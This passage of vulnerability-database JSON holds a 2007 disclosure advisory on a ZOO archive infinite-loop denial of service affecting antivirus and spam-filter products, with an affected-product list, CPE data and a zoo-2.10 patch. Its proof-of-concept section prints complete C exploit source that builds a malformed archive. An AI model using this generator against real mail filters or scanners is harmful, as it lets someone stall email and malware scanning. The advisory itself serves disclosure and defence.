        "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1673"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-1673"
      },
      {
        "trust": 0.6,
        "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/34080"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/467646/100/0/threaded"
      },
      {
        "trust": 0.3,
        "url": "http://www.avast.com"
      },
      {
        "trust": 0.3,
        "url": "http://www.avira.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.pandasoftware.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.picozip.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.winace.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/467646"
      },
      {
        "trust": 0.3,
        "url": "http://archives.math.utk.edu/software/multi-platform/gap/util/unzoo.c"
      },
      {
        "trust": 0.1,
        "url": "http://www.guay-leroux.com"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1671"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1672"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1669"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-1670"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-25035"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1673"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-25035"
      },
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1673"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-05-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-25035"
      },
      {
        "date": "2007-05-04T00:00:00",
        "db": "BID",
        "id": "23823"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "date": "2007-05-04T16:51:04",
        "db": "PACKETSTORM",
        "id": "56479"
      },
      {
        "date": "2007-05-09T01:19:00",
        "db": "NVD",
        "id": "CVE-2007-1673"
      },
      {
        "date": "2007-05-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-25035"
      },
      {
        "date": "2016-07-06T14:39:00",
        "db": "BID",
        "id": "23823"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      },
      {
        "date": "2018-10-16T16:40:28.443000",
        "db": "NVD",
        "id": "CVE-2007-1673"
      },
      {
        "date": "2007-05-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "AMaViS Of multiple products used in  unzoo.c Service disruption in  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001745"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-118"
      }
    ],
    "trust": 0.6
  }
}

var-200705-0183
Vulnerability from variot

zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. (1) Barracuda Spam Firewall Or (2) Spam Firewall ,and (3) AMaViS Used in etc. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm.

Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.

Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/

The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications.

The vulnerability is caused due to an error in the handling of Zoo archives. This can be exploited to cause an infinite loop resulting in high CPU utilisation.

SOLUTION: Update to firmware version 3.4 and virus definition 2.0.6399 or later.

PROVIDED AND/OR DISCOVERED BY: Jean-Sebastien Guay-Leroux

ORIGINAL ADVISORY: Barracuda Networks: http://www.barracudanetworks.com/ns/resources/tech_alert.php

Jean-Sebastien Guay-Leroux: http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt

About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

. Topic: Multiple vendors ZOO file decompression infinite loop DoS

Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673

I. BACKGROUND

Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.

II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition.

III. AFFECTED SOFTWARES

o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip

IV. IMPACT

If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.

If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.

V. SOLUTION

o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.

o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.

o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.

o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.

o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.

o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.

o WinAce was contacted but no response was received from them.

o PicoZip was contacted but no response was received from them.

VI. PROOF OF CONCEPT

Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.

Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.

/*

Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS

coded by Jean-S\xe9bastien Guay-Leroux September 2006

*/

include

include

include

// Structure of a ZOO header

define ZOO_HEADER_SIZE 0x0000002a

define ZH_TEXT 0

define ZH_TAG 20

define ZH_START_OFFSET 24

define ZH_NEG_START_OFFSET 28

define ZH_MAJ_VER 32

define ZH_MIN_VER 33

define ZH_ARC_HTYPE 34

define ZH_ARC_COMMENT 35

define ZH_ARC_COMMENT_LENGTH 39

define ZH_VERSION_DATA 41

define D_DIRENTRY_LENGTH 56

define D_TAG 0

define D_TYPE 4

define D_PACKING_METHOD 5

define D_NEXT_ENTRY 6

define D_OFFSET 10

define D_DATE 14

define D_TIME 16

define D_FILE_CRC 18

define D_ORIGINAL_SIZE 20

define D_SIZE_NOW 24

define D_MAJ_VER 28

define D_MIN_VER 29

define D_DELETED 30

define D_FILE_STRUCT 31

define D_COMMENT_OFFSET 32

define D_COMMENT_SIZE 36

define D_FILENAME 38

define D_VAR_DIR_LEN 51

define D_TIMEZONE 53

define D_DIR_CRC 54

define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )

define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )

define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

void put_byte (char ptr, unsigned char data) { ptr = data; }

void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }

void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }

FILE * open_file (char *filename) {

     FILE *fp;

     fp = fopen ( filename , "w" );

     if (!fp) {
             perror ("Cant open file");
             exit (1);
     }

     return fp;

}

void usage (char *progname) {

     printf ("\nTo use:\n");
     printf ("%s <archive name>\n\n", progname);

     exit (1);

}

int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;

     if ( argc != 2) {
             usage ( argv[0] );
     }

     strncpy (filename, argv[1], 255);

     if (!hdr || !filename) {
             perror ("Error allocating memory");
             exit (1);
     }

     memset (hdr, 0x00, 4096);

     // Build a ZOO header
     memcpy          (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
     put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);
     put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
     put_longword    (hdr + ZH_NEG_START_OFFSET,
         (ZOO_HEADER_SIZE) * -1);
     put_byte        (hdr + ZH_MAJ_VER, 2);
     put_byte        (hdr + ZH_MIN_VER, 0);
     put_byte        (hdr + ZH_ARC_HTYPE, 1);
     put_longword    (hdr + ZH_ARC_COMMENT, 0);
     put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);
     put_byte        (hdr + ZH_VERSION_DATA, 3);

     // Build vulnerable direntry struct
     put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
     put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
     put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
     put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
     put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
     memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,
                         "AAAAAAAA.AAA", 13);

     total_size = ZOO_HEADER_SIZE + 51;

     fp = open_file (filename);

     if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
             printf ("The file has been written\n");
     } else {
             printf ("Cant write to the file\n");
             exit (1);
     }

     fclose (fp);

     return 0;

}

VII. PATCH

To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:

diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /

static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }

#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /

loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /

diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /

while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }

  • / Begin tracking our position in the file /
  • zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
  • / Make sure we are not seeking to already processed data /
  • if (direntry.next <= zoo_pointer)
  • prterror ('f', "ZOO chain structure is corrupted\n");
  • zoo_pointer = direntry.next;
             /* ..seek to next dir entry */
    zooseek (zoo_file, direntry.next, 0);
    

VIII. CREDITS

Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.

IX. REFERENCES

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669

  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670

  3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671

  4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672

  5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673

X. HISTORY

2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0183",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "amavis",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "amavis",
        "version": "2.4.1"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "barracuda",
        "version": "3.4 and later"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "panda",
        "version": "5.53"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.3"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.0.54"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.03.055"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.15.026"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.1.18"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.1.17"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.4"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.01.001"
      },
      {
        "model": "spam firewall",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "barracuda",
        "version": "3.3.03.053"
      },
      {
        "model": "zoo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "zoo",
        "version": "2.10"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.605"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.5"
      },
      {
        "model": "winace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winace",
        "version": "2.60"
      },
      {
        "model": "unzoo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "unzoo",
        "version": "4.4-2"
      },
      {
        "model": "picozip",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "picozip",
        "version": "4.0.2"
      },
      {
        "model": "picozip",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "picozip",
        "version": "4.0.1"
      },
      {
        "model": "titanium antivirus antispyware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2006+"
      },
      {
        "model": "titanium antivirus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2005"
      },
      {
        "model": "platinum internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "20070"
      },
      {
        "model": "platinum internet security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2006"
      },
      {
        "model": "antivirus platinum",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2.0"
      },
      {
        "model": "antivirus for netware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "2.0"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "5.54.1"
      },
      {
        "model": "activescan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "panda",
        "version": "5.0"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.15026"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.18"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.1.17"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.055"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.053"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.03.022"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.01.001"
      },
      {
        "model": "networks barracuda spam firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "barracuda",
        "version": "3.3.0.54"
      },
      {
        "model": "desktop for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "1.00.00.68"
      },
      {
        "model": "antivir workstation professional build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "367"
      },
      {
        "model": "antivir personaledition premium build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "228"
      },
      {
        "model": "antivir personaledition classic build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "180"
      },
      {
        "model": "antivir",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avira",
        "version": "6.35.00.00"
      },
      {
        "model": "avast! linux home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "1.0.5"
      },
      {
        "model": "avast! linux home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "1.0.5-1"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.726"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.676"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.660"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.566"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.489"
      },
      {
        "model": "antivirus server edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.460"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.844"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.827"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.691"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.665"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.652"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.603"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6"
      },
      {
        "model": "antivirus professional edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.0"
      },
      {
        "model": "antivirus managed client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.394"
      },
      {
        "model": "antivirus managed client",
        "scope": null,
        "trust": 0.3,
        "vendor": "avast",
        "version": null
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.869"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.844"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.7.827"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.691"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.665"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.655"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6.652"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.6"
      },
      {
        "model": "antivirus home edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avast",
        "version": "4.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "23823"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001742"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-1669"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-120"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.01.001:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.053:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.18:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.0.54:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.17:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.055:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.15.026:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
